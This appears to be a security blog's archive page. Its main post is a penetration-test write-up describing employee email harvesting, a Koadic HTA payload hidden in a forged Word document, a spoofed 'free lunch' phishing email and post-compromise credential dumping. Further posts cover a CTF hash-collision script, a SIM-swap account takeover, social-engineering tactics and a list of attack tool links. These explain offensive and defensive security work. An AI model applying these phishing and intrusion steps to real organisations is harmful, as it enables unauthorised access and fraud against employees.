There is a shell in your lunch-box

| Posted in Security Articles |


My team, was recently engaged by a client (Hackme) to perform a black-box external penetration test. The objective was simple – see how susceptible the organization is from an external point of view and test the effectiveness of the security controls that are managed enterprise-wide. As such, asides, the company name, we were given “ZERO” information.



The following details illustrates how we embarked upon this assessment which resulted in…
Well, read on…


We kicked off with some OSINT 101 :). There are quite a number of open source intelligence tools – to assist in gathering emails, subdomains, hosts, employee names, etc from different public sources like search engines and shodan. There is an exhaustive list of such awesome tools here .

Using quite a few open source intelligence tools, we obtained publicly available documents relating to the organization. With Google dork to the rescue, we ran some basic search strings: “site:* ext:xls OR ext:docx OR ext:pptx” . Of course, our aim was not to tirelessly search for documents. Rather, our objective was to understand the organization’s naming schema by examining the metadata of the documents we found (most especially Microsoft Word, PowerPoint and Excel). One can also use FOCA for this.

For this assessment, using theharvester, I noticed that employees emails followed a particular naming convention – the first letter of the firstname + surname @ i.e.

Armed with this knowledge, we forked out from LinkedIn the list of all current employees of Hackme using the following google dork syntax: -inurl:dir "at Hackme" "Current". A typical example is shown above using Google Inc as a reference company.


By hacking a script to automate the process, we copied out the firstnames, lastnames and the roles of the current employees of Hackme. A tiring approach is to manually crawl through the google pages in search for these names and role or one could also use GoogleScraper:

GoogleScraper -m http –keyword " -inurl:dir 'at Hackme' 'Current'" –num-pages-for-keyword 3 –output-filename output.json

…and then the results:

Again, I leave the possibilities to your imagination – but you can easily convert this to a .csv file using or any other converter that works for you.

…and then using your favorite word processor (word merge, notepad++, etc) or some good scriptfu skills, merge the firstname + lastname – to form your email list.

Now it’s time to feed our target list a payload…


Since we are simulating a black-box external attack, we decided (just like what an attacker would do) to gain code execution using malicious payloads. As such, we thought of creating a payload and sending it via emails to employees of Hackme. We also know that it is a common practice for some file type/extensions to be blocked by the organization’s email filters – to limit exposure to risk.


This then brings us to using Koadic C3 COM Command & Control, a very decent framework just like your Meterpreter or Empire.What made it really stand out asides the beautiful interface is that it allows one to dump hashes, download/upload files, execute commands, bypass UAC, scan local network for open SMB, pivot to another machine, load mimikatz and a lot more.

So we ran Koadic and set the necessary variables – using the "stager/js/mshta " module (serves payloads in memory using MSHTA.exe HTML Applications).

The result was a spawn of our HTA payload url However, we need our targets to execute our payload as “mshta”. In recent years, HTA payloads have been used as a web attack vector and also, to drop malware on a victim’s PC. Now we need to get this payload past our victim’s numerous defenses.

Here comes the tricky part – we needed a way to have the victim run “mshta” without our payload being spawned as a child process of mshta.exe – as we suspect this organization’s blue team may flag this.

Thankfully, we saw the tip below from Matt Nelson

and interestingly, the team at NCCgroup have this implemented in Demiguise. So here is our final payload saved as a .hta file.

The next step typically is to send our .hta payload as an embedded OLE object.

The intended attack scenario was:

  1. Send a Microsoft word document with our .hta payload embedded as an OLE object.
  2. Get the user to open the word document and the embedded OLE object.
  3. This spawns a new process and we get a shell access into our victim’s PC.

Now we get to the interesting part, we need our victim to open the Microsoft word document and our payload.

 To do this, we need a very compelling story – just because users are getting smarter. So we headed back to doing more recon.

…and more recon

We need to know more about Hackme – specifically the culture and employees behaviour. The question we kept asking ourselves was what would interest the employees?”

Where else to get this information than Glassdoor , a platform that gives you inside scoop on companies with employee reviews about salaries, benefits, pros and cons of working with the company.

After poring through reviews of Hackme on Glassdoor, we found some common themes:

1. Some employees felt mobility was a challenge as the office is quite a long distance from residential locations.

2. Employees love the organization because they get free lunch.

But Wait!

Like the old saying goes, the fastest way to a man's heart is through his stomach. So what better way to get the employees to open our payload embedded word document? Send them an email – telling them there is a change in the FREE LUNCH menu starting from tomorrow.

Rather than sending any random phishing email to employees that could be spotted easily, we decided a seemingly genuine email would be ideal complete with Hackme email signature while observing the organization email culture. Now, how do we make our email more believable? By sending an email to Customer service/Help Desk with a service request and observing the email signature in the reponse.

… recon again??????

We headed back to Linkedin, to look for the name of either the HR Manager, Logistic Manager or Admin Manager (whichever is appropriate) of Hackme. We carefully crafted an email signature with the name we selected.

We are halfway to sending our payload now. Have some patience and read on…

…time to send our payload

From the metadata recon done earlier, we could tell what our target organization’s document headers and footers looked like. I then created a new word document like the one shown below with a splitting image of Hackme document template with appropriate headers/footers.

…and then we embedded our .hta as an OLE object. Microsoft Word Document >> Insert >> Object >> Package. We changed the icon to Microsoft Word’s icon and also the caption to reflect our message.

Don’t forget the antivirus!!!

In other to check the detection rate of our payload – and to see if it will be flagged as malicious by Hackme antivirus solution (if any), we did a quick AV scan on was used because according to them, they don’t distribute payload samples to AV companies. We scanned both the maldoc and the .hta file as well.


its’ time to make it rain send our email

If the target org does not have SPF, DKIM and DMARC configured, one can easily spoof the HR Manager, Logistic Manager or Admin Manager’s email address. In this case, I created a Gmail account (yes, gmail works too) using the Logistic Manager's first name and last name – and then spiced it up with his signature which was gotten earlier.

Let the shells in

Shortly after sending the email, within a period of about 3 minutes, we had at least 30 shell connections! W00t!!!


What next?

The rest they often say is history. From here-on, using the mimikatz modules, we escalated privileges, dumped hashes, scanned the local network of Hackme, pivoted into other PCs, browsed the target’s file systems and even became domain admins etc.

In conclusion

All in all, this was a very fun engagement. Whilst it might take an attacker a month/2months/a year of dedication to break into an organization – through a loophole at the infrastructure level. It can be fairly easy for one to gain access by exploiting the human factor.

"Once you understand your target environment, devising a creative means in gaining access to the environment becomes fairly easy”.

The moral of the exercise is: Recon, recon and more recon – for a wise man once said “Give me six hours to chop down a tree and I will spend the first four sharpening the axe".


– Rotimi Akinyele


Using the SHA1 collision attack to solve the BostonKeyParty CTF challenge

| Posted in Security Articles |


This is a writeup to the Boston Key Party CTF 2017 Prudential challenge – which I took part in over the weekend. .

I viewed the source of the webpage and found out an index.txt file was being referenced.

Snippets below:

require 'flag.php';
if (isset($_GET['name']) and isset($_GET['password'])) {
    $name = (string)$_GET['name'];
    $password = (string)$_GET['password'];
    if ($name == $password) {
        print 'Your password can not be your name.';
    } else if (sha1($name) === sha1($password)) {
      die('Flag: '.$flag);
    } else {
        print '<p class="alert">Invalid password.</p>';
} ?>


Two conditions need to be met here – to display the flag.

  1. The $name entered must not be the same as the $password
  2. The sha1($name) must be the same as sha1($password)


My thought-process at this point was to have different values for $name and $password but with the same sha1 signature. What immediately comes to mind is the SHA1 Collision attack recently revealed by the google team.

According to the google team, “It is now practically possible to craft two colliding PDF files and obtain a SHA-1 digital signature on the first PDF file which can also be abused as a valid signature on the second PDF file.”

Two different PDF files with the same checksum are available here:

I then came up with a quick and dirty python script to do the job. This script takes the value of the first pdf as parameter “name” and the second pdf as parameter “password”

import requests
import urllib2
rotimi = urllib2.urlopen("").read()[:500];
letmein = urllib2.urlopen("").read()[:500];
r = requests.get('', params={'name': rotimi, 'password': letmein});
print r.text

After running this, I got the flag : FLAG{AfterThursdayWeHadToReduceThePointValue}

CSAW CTF Quals 2016 Writeups

| Posted in Security Articles |


This weekend was a very busy one for me – as I had to participate in 2 CTF events – MITRE and CSAW Quals with my team, NaijaSecForce. We placed 191th out of 1274 teams in the CSAW Quals. Below is the writeup for some of the challenges I solved.

Forensics – Kill

Is kill can fix? Sign the autopsy file?



We were given a .pcapng file. This was quite easy as our old friend, Grep – did the job.

ICECTF 2016 Writeups

| Posted in Security Articles |


I recently just started participating in CTF events with my team, NaijaSecForce. However, due to time constraints, it has always been a struggle coming up with writeups on how we solved some of the challenges. Luckily, ICECTF 2016 was on for 2weeks – so I was able to come up with writeups for some of the challenges I solved.

ICECTF is a Jeopardy-style CTF where you are given a question or task where you are suppose to extract a flag from it. I participated with my team NaijaSecForce and we placed 188th out of 1696 teams (yaaay. .we made top 11% :-).  So without further ado, let’s get to cracking.

Tips to staying safe online this festive season

| Posted in Security Articles |


The holiday season is upon us and as always, we all are scrambling to get the best deals online and in stores. However, a few wrong clicks this season could land cybercriminals topping your list of people who will be receiving presents this year.

This year has witnessed lots of significant breaches ranging from a $40m cyber-heist by a Nigerian bank IT worker to the huge data leakage at Sony, just about a week ago.

Information Security expert, Rotimi Akinyele of PhynxLabs said online users can easily put themselves and their devices at risk, unless they take precautions and avoid the common mistakes highlighted below that could compromise their security.


Beware of the Bank Verification Number (BVN) Scam

The ongoing Bank Verification Number (BVN) introduced by the CBN as a means of uniquely identifying bank customers across the Nigerian Banking industry has provided a fertile ground for cyber criminals to defraud unsuspecting bank customers.

Scam emails purportedly sent from Banks/CBN are in circulation urging bank customers to visit a website to activate their BVN online as failure to do so would result in their account(s) and debit cards being deactivated.

Please note that BVN registration can only be done physically at a bank’s branch. There is no technology now to replace the physical capture of your biometric data which the BVN seeks to achieve.

Do NOT access your accounts from Public WIFi

Just because a WiFi is free doesn’t mean you should connect to it any time it’s available. When you’re banking or making other online payments, it’s better to connect with EDGE or 3G, even if it’s slower. It might only be 45seconds of doing an online bank transaction, but if the wireless network has been compromised, that is more than enough time needed for a cyber-criminal to collect your data.

Use a secure password

It’s crucial to always use strong passwords as passwords are the first line of defense against cyber crooks. Try not to use names of your family, pets, first car, mother’s maiden name, etc. as all these can be easily guessed, brute forced or even available on social media sites like facebook, twitter or instagram. Make sure to use a mixture of characters, numbers, and letters of at least 8 characters when choosing your password; as only this will add a high level of difficulty for any attempted password theft.  Also, do not reuse your passwords as a compromise on one would translate to a compromise on all.

Stay safe on social networking sites

Social media sites are increasingly becoming targets for spams, scams and other online attacks. Asides mining data from tons of “status updates” for targeted attacks, cyber criminals have mastered the act of baiting unsuspecting users with well-crafted short but compelling posts offering free entry to a Christmas competition with a fantastic prize. The general rule is “there is no free lunch or freebies on the internet – if you’re not buying a product then you are the product”. Users who click the links then inadvertently act as accomplices to the cyber-criminals because the malicious scripts would automatically re-post the links, images or videos on their contacts’ walls or timelines. If an offer looks too good to be true, it probably is. Do NOT click.

Protect yourself from fraudulent emails

If you receive an email urging you to download an unknown tax payment attachment or an email informing you of an urgent pending transaction and you need to login with your details to verify, DELETE that email. Such emails usually trick users into visiting the site, and once you do, viruses and spywares get downloaded on your device which automatically joins you to a network of enslaved computers that have been programmed to carry out malicious deeds. No reputable organization would send emails to collect user names, passwords, token keys or Debit/Credit card details.


The threats to your online accounts increase daily, however, the tips above can help you stay protected online while still providing the convenience online access offers you this holiday.

Stay safe online and happy holiday!

Rotimi Akinyele is the Chief Security Evangelist at PhynxLabs where he leads the application and Network security competency.

How Airtel Security Flaw Led To Website Hacking

| Posted in Security Articles |


In the space of one hour, the entire webmaster board was overloaded with several threads titled “ got hacked”. On checking one of the threads, I hurriedly fired up my browser, checked the Naijaloaded site and poof, I had a defaced webpage before me.

Next thing I did was to send Naijaloaded’s owner a mail informing him of the hack which he then replied to this morning saying “They Swapped my SIM, Used the Forgot Password Features and Yahoo Sent the Guy my Code, he then Changed my Yahoo Password and Requested for a Password Changing Note from my Domain Registrar, Then he finally Changed my DNS”.

At first, I didn’t understand the swapping part. So I fired up my browser again and started crawling through webpages with the dork “Airtel Nigeria instant swap”.

After much crawling, I learnt that to swap your airtel sim (i.e. to hijack another person’s airtel sim), all you need is

1. An airtel swap sim which goes for just N300 and offered for sale here
2. Four (4) most dial’d no
3. The serial number on the new airtel swap sim

. .and in 20mins max, d new Sim will be ready.

That easy yeah?!

After the “hacker” swapped Naijaloaded’s owner SIM, he went on to use Yahoo’s Forgot Password Features which yahoo then sent the hacker a code (to the swapped sim), he then Changed his Yahoo Password after which the hacker requested for a Password Changing Note from Domain Registrar and ended up changing ‘s DNS.

A brilliant social engineering attack it was!

This clearly exposes vital security flaws in several customer service systems.

All a malicious person need know to hijack your SIM is your 4 most dial’d nos (your dad, mom, girlfriend, line manager, direct subordinate, etc).

You know what this means? You can directly intercept that scheduled business call by hijacking that Big Oga’s sim.

The guy that perpetrated this act not only digitally hacked the owner but they socially hacked him too as he could receive calls on his behalf.

It’s quite upsetting that the ecosystem that we’ve placed so much of our trust in(In this case Airtel) has let some of us down so thoroughly.

Social Engineering, albeit a new one in the Nigerian space, is here to stay. .Folks Are You Ready?

NB: I originally posted this blogpost here. You can follow-up the discussion there

Working with People: An Introduction to Social Engineering

| Posted in Security Articles |


A reader sent me this great article on Social engineering, so I decided to share with you all. Enjoy 🙂

Humans are inherently social creatures who have developed a world strongly based on interacting with others. Just like the world of information technology, the human social protocols are a complex series of rules and guidelines for how people behave when interacting with each other, and just like any other system, there are methods to use and abuse it once you understand the rules that govern it. Social engineering is a broad subject, but in this article we will focus mostly on social engineering as it is used to gain access to social groups and sensitive information.

What Is Social Engineering?


Social engineering is using the common tendencies of how people interact with others in order to gain information or a benefit of some kind. Effectively, social engineering can be referred to as the hacking of people. Before the Internet age, social engineering would more likely be referred to as conning, but the scope of social engineering’s applications goes beyond tricking people out of money. It is about causing people to act according to your wishes. Getting someone to say yes to a date is social engineering. So is getting your company a contract from a tough client. In regards to information security, social engineering is getting people to give up protected information.

A social engineering definition can be found here.

How Effective Is Social Engineering?


Even companies that place a high focus on securing their information networks can prove extremely vulnerable to social engineering attacks. DefCon, one of the largest hacking conferences in the world, routinely features a social engineering competition that has demonstrated over and over again that simple tactics can be used to get enough information to potentially do harm to a company. Position in the company also seems to have almost no effect on how susceptible a person is to social engineering; a big wig is just as likely to give up information as a cashier, but the big wig also usually has access to more pertinent info.

Social engineering is gaining attention for its insidious effectiveness, and is starting to get recognized in the media and the corporate world. Check out these news articles for an idea of how it is being perceived:

Smooth-Talking Hackers Test Hi-Tech Titan’s Skills – A look at DefCon hacking competitions, utilizing social engineering within legal boundaries to ferret out intelligence designed to weaken a company’s security.

Social engineering to blame in Syrian Electronic Army hijack of the Onion – The targets of these sorts of attacks aren’t always the ones you might expect, the Onion was a recent victim of a phishing scheme.

Facebook Social Engineering Attack Strikes NATO – Often, the targets are important, such as this attack against NATO. Every organization contains a human element, the target of savvy social engineers.

How a lying ‘social engineer’ hacked Wal-Mart – Many people are naturally biased to trust based on a set of subtle criteria; a tone of voice, a style of dress, even word choices can lead people to give credence to otherwise nonsensical ideas or situations, like this Wal-Mart store manager being duped into giving away company data in exchange for a non-existent contract possibility.


General Tips for Social Engineering


These are common guidelines and methods used by social engineers before and during any assignment on which they are working. These focus more on the preparation and mindset of the social engineer than the actual attack methods that are used.

Do Your Research


Take a look at this seminar on social engineering strategies.

Information is everywhere. If there is a topic you want to know about, you usually only need to glance at the Internet. Reading the news and press releases from a company can give you a firm background history from which to work. A social media site may give you insights into the temperament of a person or give you an idea of the social scene in which they operate. If you are trying to infiltrate a group or become closer to a person with any notable focus, then the Internet can be used to familiarize yourself with the topic.

Hackers may go above and beyond in this regard. If they manage to gain access to someone’s email account or messaging service, there may be records of conversations that can be used to mimic the person in electronic communications or learn about key topics that anyone on the inside should know about.


Read full article here:


Have you ever chatted with a Hacker within a virus?

| Posted in Security Articles |


By Franklin Zhao & Jason Zhou

This is an impressive and first-time experience in my anti-virus career. I chatted with a hacker while debugging a virus. Yes, it’s true. It happened when the Threat team were researching key loggers for Diablo III while many game players playing this game found their accounts stolen.  A sample is found in battle .net in Taiwan, China. The hacker posted a topic titled “How to farm Izual in Inferno” (Izual is a boss in Diablo III ACT 4), and provided a link in the content which, as he said, pointed to a video demonstrating the means.


Below is the ‘Video’. It’s a RAR archive actually containing two executable files. These two files are almost the same except the icon.


The malware will connect to a remote server via TCP port 80 and download a new file packed by Themida.


That’s very simple Downloader/Backdoor behavior and we are only interested in looking for key logging code for Diablo III so we didn’t pay much attention to it.

But an astonishing scene staged at this time. A chatting dialog popped up with a text message:

(Translated from the image below)

Hacker: What are you doing? Why are you researching my Trojan?

Hacker: What do you want from it?


The dialog is not from any software installed in our virtual machine. On the contrary, it’s an integrated function of the backdoor and the message is sent from the hacker who wrote the Trojan. Amazing, isn’t it? It seems that the hacker was online and he realized that we were debugging his baby.


We felt interested and continued to chat with him. He was really arrogant.

(Translated from the image below)

Chicken: I didn’t know you can see my screen.

Hacker: I would like to see your face, but what a pity you don’t have a camera.


He is telling the truth. This backdoor has powerful functions like monitoring victim’s screen, mouse controlling, viewing process and modules, and even camera controlling.


We then chatted with hacker for some time, pretending that we were green hands and would like to buy some Trojan from him. But this hacker was not so foolish to tell us all the truth. He then shut down our system remotely.

Regarding this malware, no Diablo III key logging code was captured. What it really wants to steal is dial up connection’s username and password.


It sounds like a movie story, but it’s real. We are familiar with malware and we are fighting with them every day. But chatting with malware writers in real time doesn’t happen so often. Next time, I will be on the alert.

The malware and its components are detected by the AVG as Trojan horse BackDoor.Generic variants.


Franklin Zhao & Jason Zhou




Tarot Reading! Who is calling?

| Posted in Security Articles |


Guest Post By Nurudeen Odeshina

Recently, I received a call from an unknown number. The caller went off the phone immediately I said “Hello”. This was of course against my usual habit of allowing unknown callers to speak first so that I may know who is at the other end of the phone. Anyways, I went online with the number and B.I.N.G.O! I got not only the name of my unknown caller but the location too!

There are a whole lot of (personal) information we post online most especially on social media sites. Though the intent may be to share personal information with friends and family, most of this information are also accessible by online crooks and criminals. People post names, addresses, geo-tag photos and all sorts. What more information do a criminal need to rob you? Social media makes it more fun. You can tell people’s date of birth, family members, employers, favourite hang-out spots, events they are attending and lots more. What more information does a tarot reader needs that cannot be sourced from your online presence? Your relationship status e.g. Divorced, Engaged, Married to? A Tarot reader needs no crystal balls anymore. All they need is a computer connected to the internet.


Think twice before you post personal information. Remember, criminal and crooks have online presence too and may see what you post on the internet.


Nurudeen Odeshina is an Information Value Chain Consultant (Information Security & Information Assurance), COBIT Trainer/Consultant. Passionate about #Information Security #ISO27001 #ISO22301 #PCIDSS

Follow him on twitter @Ibn_AbdulRahman

Online Penetration Testing Tools

| Posted in Security Articles |


I saw this post on eLearnSecurity and decided to share. I will be updating as time goes on.

Information gathering:
(iplookup,BGP AS lookup)
(ASN search)
(dns,whois, network lookup, …)

Exploit Search:
(google engine)

Scanning networks,web structures,..
(nmap,openvas,sqlix,sqlmap,nikto,sub_domain) http://hackertarget….
(Drupal Vulnerability Scanner)
(Joomla scanner)
(Cross Site Scripting Scanner)
(SQLi) http://www.be007.gig…
(SQLi) http://www.localvn.b…

Hack tools store:

  XSS Guide:…

SQL Injection Guide

netcat cheat sheet:…
hping3 cheatsheet:…
Metasplot meterpreter:…

Browser test:


Shellcode to exe:………


(SHA1/MD5 hash cracker on ATI and NVIDIA GPUs)
(Default Password List) http://www.phenoelit…

Analysis Malware:
(analysis system)http://mwanalysis.or…
(behavior analysis)
(behavior analysis) http://mwanalysis.or…

Google Pentest BookmarksList :….